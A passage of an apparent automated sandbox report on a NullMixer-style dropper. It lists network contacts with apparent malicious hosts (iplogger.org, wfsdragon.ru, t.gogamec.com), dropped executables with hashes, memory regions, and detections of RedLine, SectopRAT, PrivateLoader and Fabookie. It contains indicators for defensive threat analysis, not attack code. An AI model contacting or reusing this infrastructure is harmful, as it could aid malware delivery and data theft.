| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:60748 | tcp | |
| N/A | 127.0.0.1:60750 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| FR | 91.121.67.60:23325 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\setup_install.exe
| MD5 | a979670adefae9ab376382f3229f3f28 |
| SHA1 | 5b5b75a789e46a2f8ac02fba3d895fa968387c9b |
| SHA256 | a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040 |
| SHA512 | f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/2684-46-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2684-60-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3752-61-0x0000000073BCE000-0x0000000073BCF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0675f75df01bdb.exe
| MD5 | dd2fdd69b9db1cf5764dcfd429a1cf5e |
| SHA1 | c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8 |
| SHA256 | d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe |
| SHA512 | c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d |
memory/4612-73-0x0000000004C60000-0x0000000005288000-memory.dmp
memory/4612-72-0x0000000073BC0000-0x0000000074370000-memory.dmp
memory/4612-71-0x0000000004590000-0x00000000045C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat062000ca9aa6.exe
| MD5 | 1cc8a64b178076dca421fedc3a248a56 |
| SHA1 | db8ed444965577dfb6db4f92ddd8d96a157ddea5 |
| SHA256 | 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345 |
| SHA512 | c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0618d93ac2c5c.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06ebc37d1c94352.exe
| MD5 | e9133ca1a95483a3331d0f336685302d |
| SHA1 | 48c1348e20b26be8227ed63a1db0f13716f1b8e3 |
| SHA256 | 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b |
| SHA512 | 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0619212f22dd7.exe
| MD5 | 854ea0bc0602795b95da3be8257c530f |
| SHA1 | f243a71edc902ed91d0f990630a73d0d01828c73 |
| SHA256 | c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e |
| SHA512 | 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat06f5ed0e3bb24.exe
| MD5 | 0e05650d436fd4d92775cd4f65973870 |
| SHA1 | 4d13aaa6b18630d0c89400cee5933130f03bd762 |
| SHA256 | 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16 |
| SHA512 | 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat060fd7e42d2.exe
| MD5 | 29c9683aa48f1e3a29168f6b0ff3be04 |
| SHA1 | f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f |
| SHA256 | e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901 |
| SHA512 | a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0647140c100d63.exe
| MD5 | 10e13cc7b41d162ab578256f27d297b1 |
| SHA1 | 1d938b7e6e99951d9b8139f078483539120021e6 |
| SHA256 | 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9 |
| SHA512 | 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\Sat0663b341399ee.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
memory/2684-59-0x0000000064941000-0x000000006494F000-memory.dmp
memory/2684-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-57-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2684-56-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2684-55-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-53-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-51-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2684-50-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2684-49-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2684-47-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS8D8600E7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/4244-83-0x00000000002B0000-0x00000000002CA000-memory.dmp
memory/4612-87-0x00000000052D0000-0x00000000052F2000-memory.dmp
memory/8-90-0x0000000000710000-0x0000000000778000-memory.dmp
memory/4612-100-0x0000000005550000-0x00000000058A4000-memory.dmp
memory/4612-89-0x00000000054E0000-0x0000000005546000-memory.dmp
memory/8-111-0x0000000002A00000-0x0000000002A1E000-memory.dmp
memory/8-106-0x0000000005070000-0x00000000050E6000-memory.dmp
memory/4612-88-0x0000000005470000-0x00000000054D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_htflkwkw.ify.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4244-86-0x0000000002320000-0x0000000002326000-memory.dmp
memory/8-112-0x0000000005810000-0x0000000005DB4000-memory.dmp
memory/3752-113-0x00000000065D0000-0x00000000065EE000-memory.dmp
memory/3752-114-0x0000000006AB0000-0x0000000006AFC000-memory.dmp
memory/2684-122-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3076-126-0x0000000000400000-0x0000000000883000-memory.dmp
memory/2684-125-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2684-124-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2684-123-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2684-120-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2684-116-0x0000000000400000-0x000000000051B000-memory.dmp
memory/3752-129-0x0000000006BA0000-0x0000000006BD2000-memory.dmp
memory/3752-130-0x000000006E870000-0x000000006E8BC000-memory.dmp
memory/3752-140-0x0000000006B80000-0x0000000006B9E000-memory.dmp
memory/3752-144-0x00000000077C0000-0x0000000007863000-memory.dmp
memory/4612-145-0x000000006E870000-0x000000006E8BC000-memory.dmp
memory/4612-159-0x0000000006BD0000-0x0000000006BEA000-memory.dmp
memory/3752-161-0x0000000007F40000-0x00000000085BA000-memory.dmp
memory/4612-163-0x0000000006F10000-0x0000000006F1A000-memory.dmp
memory/4612-164-0x0000000007100000-0x0000000007196000-memory.dmp
memory/4612-165-0x0000000007090000-0x00000000070A1000-memory.dmp
memory/4612-166-0x00000000070C0000-0x00000000070CE000-memory.dmp
memory/3752-167-0x0000000007B40000-0x0000000007B54000-memory.dmp
memory/3752-188-0x0000000007C30000-0x0000000007C4A000-memory.dmp
memory/3752-189-0x0000000007C20000-0x0000000007C28000-memory.dmp
memory/4612-195-0x0000000073BC0000-0x0000000074370000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Temp\IiKZCUV.MQ
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4
| MD5 | 243a3d5a63c4d0f3a18a3d340f50ed8d |
| SHA1 | 4b5d7d91fdc7666d131ef4ed7524bdc1b024a009 |
| SHA256 | 4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1 |
| SHA512 | 64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1 |
C:\Users\Admin\AppData\Local\Temp\jB946RB.I7A
| MD5 | d4c89c7cabd256ccedd701e27b3fc31a |
| SHA1 | c01e95b983215b9a08c807084185dbd17ccd32aa |
| SHA256 | e7fe376512c6ba9b615d492961ef38a27b14d192b7c9751b75d9004370b5266c |
| SHA512 | 1d3d59c17368f3e264241fc5100971b74487d0bdc0e7902081a332314fdc59e07475f1aaeed17cd2bc1f64c59378ebe1b76e83ea046351d6691c647a60cbb421 |
C:\Users\Admin\AppData\Local\Temp\r6f7sE.I
| MD5 | bd3523387b577979a0d86ff911f97f8b |
| SHA1 | 1f90298142a27ec55118317ee63609664bcecb45 |
| SHA256 | a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36 |
| SHA512 | b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286 |
C:\Users\Admin\AppData\Local\Temp\XHnbBPN.0kM
| MD5 | 008132f08399ae8927e41d1ea88ffe74 |
| SHA1 | c7d2551b905d578779533418e7a394fd94f17903 |
| SHA256 | 439a6346ae58af4ce7d863d18b70b98e5628ea0f81cd740dd3b886fbe3a7246a |
| SHA512 | 36a05a28325fc92017f6c44e7a6d88abe15a935aef61aa0047926efdb1ec8d3359fdb9e02d4602d4738ad25503e0dbe66f26d45bbea7f10d219aaa015c210d4e |
C:\Users\Admin\AppData\Local\Temp\BtDIj1.fYl
| MD5 | d17564f93bb4a4cf11c46726ea1fe74b |
| SHA1 | 84cbff97ff148296bf36898dcf640ad18eb317c9 |
| SHA256 | 96a4ccf3bc2092c2198cad0beb6a6fdc26db7f59bb82bf4e476bbac6fc783ce0 |
| SHA512 | f327cac0e017ebdaa87e1a8ed40d3abfa5a7614250a9759d6ae62f0f7149aa8ee4a26bb74854ef3860ae8911d87b55803d1f4c0fd58d19507ac4b91eebbb48ff |
C:\Users\Admin\AppData\Local\Temp\Q_tW.pL
| MD5 | 40ba2d6fcce0565f8d90055a8fb9975b |
| SHA1 | c7529fea938658e19d238200af795533cba13c5c |
| SHA256 | df403d434bdcc3b3604349310c62ca68718f1388a3d9c6155e026ff685b555b6 |
| SHA512 | fd8dd7936d96952acaba5f96ff6116b17bc79f770b324945ba966b00e6b3ff6c9f6388bd402d3e5ad40d42a37123416fe904a7d15c749585593caecfcf46b816 |
memory/1760-222-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1760-225-0x0000000004F70000-0x000000000507A000-memory.dmp
memory/1760-227-0x0000000004EE0000-0x0000000004F2C000-memory.dmp
memory/1760-226-0x0000000004EA0000-0x0000000004EDC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/1760-224-0x0000000004D00000-0x0000000004D12000-memory.dmp
memory/1760-223-0x0000000005300000-0x0000000005918000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\U56d.r
| MD5 | 4d5164bd007e1af1a6b436b89fc98329 |
| SHA1 | 808e5215729cff6daf37bfcac7af29e8959a7c26 |
| SHA256 | eaeb79cf3f2e99906d1b5f89b92fcb5555117f0a527247b5becbc78cf65cc434 |
| SHA512 | f977ced0b42db76bab7d79d35f6dad56bdbbde527ccde0f8810838d5364b89223f9ec673915ac9b0f595bad7251d3d17d1be479c8ed5bf56c19aac8470a6b668 |
C:\Users\Admin\AppData\Local\Temp\FdKD47Ef.i1
| MD5 | 22e51c0e8d96e09cf8571ef2a4f91cfb |
| SHA1 | 46f3a3ad48c540816c110c67b8eab824ebeec8c1 |
| SHA256 | e296a4b63a6561115cab7809fb27eb85d3db864d59ecbce82b784d52572a83f1 |
| SHA512 | 40e328acf47cbf6754b29b856e6a17e6cc15cf9b11b9e58b267fb26b14d598e71cefa266b43f552d51d81dca712e5024a77ca09fb1535ae54cb8586e8b5ccc7f |
C:\Users\Admin\AppData\Local\Temp\ykifDQA.1
| MD5 | 7b25b2318e896fa8f9a99f635c146c9b |
| SHA1 | 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2 |
| SHA256 | 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89 |
| SHA512 | a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6 |
C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0
| MD5 | 6c83f0423cd52d999b9ad47b78ba0c6a |
| SHA1 | 1f32cbf5fdaca123d32012cbc8cb4165e1474a04 |
| SHA256 | 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae |
| SHA512 | e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec |
C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh
| MD5 | 973c9cf42285ae79a7a0766a1e70def4 |
| SHA1 | 4ab15952cbc69555102f42e290ae87d1d778c418 |
| SHA256 | 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968 |
| SHA512 | 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85 |
C:\Users\Admin\AppData\Local\Temp\20L2vNO.2
| MD5 | 4bf3493517977a637789c23464a58e06 |
| SHA1 | 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4 |
| SHA256 | ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831 |
| SHA512 | 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501 |
memory/1500-228-0x0000000000400000-0x000000000089B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7ab31342d1577fbf35832794ed7ab952 |
| SHA1 | 85c2d3f12c860791ee4aac97d54d8254f66b5c40 |
| SHA256 | 1d38ec9d273d2c68ffd4557d20c4410cfaf1888842f865e26056f17acf459c86 |
| SHA512 | a8bdf994a2faff81d11fe8292fbb34300513ccc18f02ba5963b788f8ceb42eee0aca5902bb5d2babcea43f9e4d93cc97ff4725be4476a80be0f1f0caffdf6c56 |
memory/2420-232-0x0000000003740000-0x00000000037E5000-memory.dmp
memory/2420-236-0x00000000037F0000-0x0000000003882000-memory.dmp
memory/2420-233-0x00000000037F0000-0x0000000003882000-memory.dmp
memory/3380-237-0x0000000000400000-0x000000000054C000-memory.dmp
memory/2420-238-0x0000000000400000-0x0000000000602000-memory.dmp
memory/3380-239-0x0000000003140000-0x00000000031E5000-memory.dmp
memory/3380-243-0x00000000031F0000-0x0000000003282000-memory.dmp
memory/3380-240-0x00000000031F0000-0x0000000003282000-memory.dmp
memory/3144-244-0x0000000000400000-0x000000000054C000-memory.dmp
memory/3144-253-0x00000000036D0000-0x0000000003775000-memory.dmp
memory/3144-257-0x0000000003780000-0x0000000003812000-memory.dmp
memory/3144-254-0x0000000003780000-0x0000000003812000-memory.dmp
memory/2420-259-0x00000000037F0000-0x0000000003882000-memory.dmp
memory/3380-267-0x00000000031F0000-0x0000000003282000-memory.dmp
memory/1476-270-0x00000000022A0000-0x00000000023EC000-memory.dmp
memory/1476-273-0x00000000022A0000-0x00000000023EC000-memory.dmp
memory/3144-275-0x0000000003780000-0x0000000003812000-memory.dmp
memory/1476-279-0x0000000002BD0000-0x0000000002C75000-memory.dmp
memory/1476-280-0x0000000002C80000-0x0000000002D12000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
77s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe | N/A |
